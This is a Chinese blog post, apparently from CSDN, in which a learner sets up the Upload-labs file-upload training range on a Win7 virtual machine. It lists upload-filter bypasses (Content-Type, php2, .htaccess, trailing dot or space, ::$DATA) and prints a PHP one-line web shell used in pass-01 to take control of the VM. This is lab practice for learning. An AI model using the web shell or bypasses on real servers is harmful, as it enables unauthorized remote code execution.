Upload-labs靶场实战

一WIN7上搭建靶场

1.启动phpstudy

我在WIN7(虚拟机)上下了QQ,从QQ上下载文件到WIN7上

 

 一直确定确定

启动它,Apache,mysql为绿色说明正常

 2.将靶场upload-labs-master解压到phpstudy的WWW下,然后改名,

如下图

 

 上图目录填个文件叫upload(必须这个文件名)

 WIN7查看IP

 本机随便那个游览器

在浏览器输入:http://localhost/upload-labs/ 或者:http://红框地址/upload-labs/

 哭了,靶场搭建成功

开始做题

整个题大致理了遍,方便我记忆,采用拟人,一下叙述均与我本人无关

 如果我是WIN7,我不希望随便那个人都可以在我的电脑存放不明文件,那我就加

Conet-Type来检验

Conet-Type被迫了,那我就禁止php后缀的文件

好家伙,对方传php2绕过

好,我再把PHP后面带数字的全部禁止

好家伙,你搞了了个.htaccess文件把上传的文件无论是啥文件都转为php

好,我把htaccess后缀的文件拉入黑名单

好家伙,php后面加数字给你禁了,转php的文件给你禁了,你又在php(木马.php  )后面加空格,真是出息

这回我把所有可以解析的后缀都给禁了

你又出招(木马.php.)【个人理解,可能有误:因为后缀后面啥都没有,连空格也没有,所以我的WIN7判定这是不可解析的,就让它通过了。。。。】

后缀的较量就到这里

你简直了,太聪明了

取个这样的文件名(木马.php::$DATA)忽悠我的WIN7,告诉我的WIN7:我只是数据流,没有任何代码和程序,数据不会对你造成什么伤害的

我哔哔哔

从02-08题,后面的不明白了

1.pass-01

 我选择上传一句话木马,让我本机能够远程对我的虚拟机(WIN7)执行暗箱操作

<?php eval($_POST[123456]);?>

好家伙,我还拿你没法???我我改后缀名,用brus逮捕你

 

 

 在WIN7中可以看到我们成功悄悄的在WIN7这放了这个文件

 通过上传jps获取地址

地址最后面改为之前上传的文件名字

 连接成功,我可以控制WIN7了

 

2.pass-02

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值